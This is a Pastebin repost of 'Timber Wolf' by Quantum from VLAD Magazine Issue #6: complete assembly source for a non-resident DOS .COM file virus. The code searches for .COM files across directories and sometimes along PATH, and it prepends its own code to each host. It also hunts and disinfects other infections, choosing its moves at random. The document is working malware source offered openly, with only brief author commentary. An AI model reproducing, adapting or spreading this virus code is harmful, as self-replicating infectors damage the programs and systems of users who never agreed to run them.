API tools faq
paste
FlyFar

VLAD Magazine - Issue #6 - ARTICLE.5_2 - Timber Wolf

FlyFar
Nov 19th, 2023
76
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 7.64 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ;
  2. ; "Timber Wolf" by Quantum / VLAD
  3. ;
  4. ; If you have a look at the animal kingdom, you can see two distinct groups
  5. ; of animals.  There are the ones who hide and breed as much as they can
  6. ; with the idea that the more offspring they have the more chance their
  7. ; species has for survival.  And then there are the ones who hunt those that
  8. ; hide, outrun any would-be predators, and have their offspring in large
  9. ; litters.  Most virii fall into the first category.  This virus falls
  10. ; into the second.
  11. ;
  12. ; It's a non-resident com infector that doesn't stay for long on the one
  13. ; executable.  It jumps from com to com, hunting appending, and prepending
  14. ; com infections.  If it comes in contact with another one of its kind they
  15. ; will run together in a pack but still with an individual nature - randomly
  16. ; selecting whether to move and what to attack.
  17. ;
  18.  
  19. vstart:
  20.  
  21. mov si,offset retcode               ; put the return code far
  22. mov di,0fcedh - (vend - vstart) - (vend - retcode) - 2
  23. mov cx,(vend-retcode)/2+1
  24. rep movsw
  25.  
  26. genretcodeend:
  27.  
  28. mov ax,[2ch]    ; get the segment of the enviroment
  29. mov ds,ax
  30. xor si,si       ; start at offset 0
  31. loop1:
  32. lodsb           ; look for a zero
  33. or al,al
  34. jnz loop1
  35. lodsb           ; followed by another zero
  36. or al,al
  37. jnz loop1
  38. lodsw
  39. cmp ax,1        ; then a 1 and a zero
  40. jnz loop1
  41. mov di,0fcf0h   ; si now points to the arg 0
  42. xor cx,cx       ; count the num of bytes copied
  43. loop2:
  44. lodsb
  45. inc cx
  46. or al,al        ; stop on a zero
  47. jz outty1
  48. cmp al,"a"      ; convert lowercase to uppercase
  49. jb noand
  50. cmp al,"z"
  51. ja noand
  52. and al,5fh
  53. noand:
  54. stosb           ; copy byte
  55. jmp loop2
  56. outty1:
  57. stosb           ; dont forget the final zero
  58.  
  59. push cs
  60. pop ds
  61. mov [0fcedh],cx  ; store the num of bytes copied
  62.  
  63. mov ah,1ah
  64. mov dx,0fdf0h    ; set the dta
  65. int 21h
  66.  
  67. mov ah,47h
  68. xor dx,dx
  69. mov si,0fcedh - (vend - vstart) - (vend - retcode) - 2 - 64
  70. int 21h
  71.  
  72. mov byte ptr [si-1],"\"
  73.  
  74. in al,40h
  75. cmp al,53            ; one in 256 chance that we go dot dot regardless
  76. jz godadotdot
  77. cmp al,61            ; one in 256 chance that we infect the path
  78. jnz finddafirst
  79.  
  80. mov ax,[2ch]
  81. mov es,ax
  82.  
  83. mov al,"P"
  84. xor di,di
  85. findp:
  86. mov cx,0ffffh
  87. repne scasb                       ; search for a "P"
  88. mov si,offset ath
  89. mov cx,3
  90. rep cmpsb                         ; next 3 bytes = "ATH" ?
  91. jnz findp
  92. mov al,";"
  93. push es
  94. pop ds
  95. lea dx,[di+1]                     ; dx = path 2 infect
  96. mov cx,0ffffh
  97. repne scasb                       ; search for a ";"
  98. mov byte ptr [di-1],0             ; replace with a zero
  99. mov ah,3bh
  100. ;int 21h                           ; change into that dir
  101. push cs
  102. push cs
  103. pop ds
  104. pop es
  105. finddafirst:
  106. mov ah,4eh
  107. xor cx,cx
  108. mov dx,offset fspec   ; find first com
  109. int 21h
  110. isitkewl:
  111. jnc checkinfect
  112. godadotdot:
  113. mov ah,3bh
  114. mov dx,offset dotdot
  115. int 21h
  116. jnc finddafirst
  117. outtyout:
  118. mov ah,3bh
  119. mov dx,0fcedh - (vend - vstart) - (vend - retcode) - 2 - 64 - 1
  120. int 21h                 ; change to original dir
  121. jmp 0fcedh - (vend - vstart) - (vend - retcode) - 2 ; outtie on error
  122. checkinfect:
  123. mov si,0fdf0h+1eh
  124. mov di,0fcedh-80h
  125. push di
  126. mov ah,60h
  127. int 21h               ; generate fully qualified filename
  128. pop di
  129. mov si,0fcf0h
  130. mov dx,di
  131. mov cx,[0fcedh]
  132. rep cmpsb             ; found file = arg 0 ?
  133. jnz infectit
  134. thatnogood:
  135. mov ah,4fh
  136. int 21h               ; if so find next file
  137. jmp isitkewl
  138. infectit:
  139.  
  140. in al,40h
  141. cmp al,23                     ; random enough chance that we wont infect
  142. ja thatnogood
  143. cmp word ptr [0fdf0h + 1ah],vend-vstart         ; found file big enough ?
  144. jb thatnogood
  145. cmp word ptr [0fdf0h + 1ah],0fcedh - (vend - vstart) - (vend - retcode) - 2 - 64
  146. ja thatnogood                                   ; found file too big ?
  147.  
  148. mov ax,3d02h
  149. int 21h                 ; open in read/write mode
  150.  
  151. xchg bx,ax
  152.  
  153. mov ah,3fh
  154. mov cx,vend-vstart                     ; read in where the virus will go
  155. mov dx,0fcedh - (vend - vstart)
  156. int 21h
  157.  
  158. call seeke                        ; goto end of file
  159.  
  160. add ax,100h                         ; calculate where the host code will be
  161. mov [offset whereorgat],ax
  162.  
  163. mov cx,vend - vstart          ; write the host code to end of the file
  164. mov dx,0fcedh - (vend - vstart)
  165. call writefile
  166.  
  167. call seeks                        ; back to the start of the file
  168.  
  169. inc byte ptr [offset infectcount]
  170. cmp byte ptr [offset infectcount],15
  171. jb nokillcount
  172. mov byte ptr [offset infectcount],0
  173. nokillcount:
  174.  
  175. mov cx,vend-vstart                  ; write out the virus code
  176. mov dx,0100h
  177. call writefile
  178.  
  179. mov ah,3eh                          ; close file
  180. int 21h
  181.  
  182. in al,40h
  183. and al,111b
  184. inc al
  185. cmp byte ptr [offset infectcount],al
  186. ja disinfect
  187.  
  188. jmp outtyout                        ; back 2 host
  189.  
  190. disinfect:
  191.  
  192. mov ax,03d02h                       ; open arg 0
  193. mov dx,0fcf0h
  194. int 21h
  195.  
  196. xchg bx,ax
  197.  
  198. mov dx,offset whereorgat-100h -1  ; goto "mov si,whereorgat" in our code
  199. call seek2dx
  200.  
  201. mov ah,3fh                          ; read it in
  202. mov cx,3
  203. mov dx,0fcedh - (vend - vstart)
  204. int 21h
  205.  
  206. ; if the mov si, bit isn't there then we have been done by a prepending
  207. cmp byte ptr [0fcedh - (vend - vstart)],0beh
  208. jz continuedisinfect
  209.  
  210. call seeke       ; seek to the end of the file
  211.  
  212. sub ax,genretcodeend-vstart    ; sub off the size of the first bit of our code
  213. mov dx,ax
  214. call seek2dx                 ; seek to that pos
  215.  
  216.  
  217. readincode:
  218.  
  219. mov ah,3fh                             ; read in the string
  220. mov cx,genretcodeend-vstart
  221. mov dx,0fcedh - (vend - vstart) + 3
  222. mov si,dx
  223. push cx
  224. int 21h
  225. pop cx
  226.  
  227. mov di,0100h                           ; is it our code ?
  228. rep cmpsb
  229. jz foundmycode
  230. call seekc                             ; no.. get the current position
  231.  
  232. dec ax                                 ; decrease by one
  233. mov dx,ax
  234. call seek2dx                          ; goto that pos
  235. or ax,ax               ; if we're at the top of the file then all is not good
  236. jnz readincode
  237. ; fucking overwriting virus wasted our code!!!!!!
  238. mov ah,3eh                    ; let's just leave
  239. int 21h
  240. jmp outtyout
  241. foundmycode:                    ; we found the string
  242. mov ah,3fh                      ; read in the rest of the file
  243. mov cx,0ffffh
  244. mov dx,0fcedh - (vend - vstart)
  245. int 21h
  246.  
  247. push ax                    ; back to the start of the file
  248. push dx
  249. call seeks
  250. pop dx
  251. pop cx
  252.  
  253. call writefile              ; write the code back
  254.  
  255. continuedisinfect:          ; continue the disinfection
  256.  
  257. mov dx,[0fcedh - (vend - vstart) + 1]   ; goto where da original code is at
  258. dec dh
  259. push dx
  260. call seek2dx
  261.  
  262. mov ah,3fh                          ; read in the original host code
  263. mov cx,vend-vstart
  264. mov dx,0fcedh - (vend - vstart) + 3
  265. int 21h
  266.  
  267. call seeks                       ; back to the start of the file
  268.  
  269. mov cx,vend-vstart                  ; write out the host code
  270. mov dx,0fcedh - (vend - vstart) + 3
  271. call writefile
  272.  
  273. pop dx
  274. call seek2dx                      ; back to the orginal EOF
  275.  
  276. xor cx,cx                           ; cut off the rest of the file
  277. call writefile
  278.  
  279. mov ah,3eh                          ; close the file
  280. int 21h
  281.  
  282. jmp outtyout
  283.  
  284. seek2dx: mov ax,04200h
  285.          jmp seek1
  286. seekc: mov ax,04201h
  287.        jmp lseek
  288. seeks: mov ax,04200h
  289.        jmp lseek
  290. seeke: mov ax,04202h
  291. lseek: xor dx,dx
  292. seek1: xor cx,cx
  293.        int 21h
  294.        ret
  295.  
  296.  
  297. writefile: mov ah,40h
  298.            int 21h
  299.            ret
  300.  
  301. db "Timber Wolf by Quantum / VLAD",0
  302. ath db "ATH"
  303. dotdot db "..",0
  304. infectcount db 0
  305. fspec db "*.com",0
  306. retcode:
  307. db 0beh                             ; mov si,
  308. whereorgat dw offset orghost
  309. mov di,0100h
  310. push di
  311. mov cx,vend - vstart
  312. rep movsb                           ; move original code back to 100h
  313. ret                                 ; jump there
  314. vend:
  315. ; host code
  316. orghost:
  317. int 20h
  318.  
Tags: virus Com infector non-resident
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!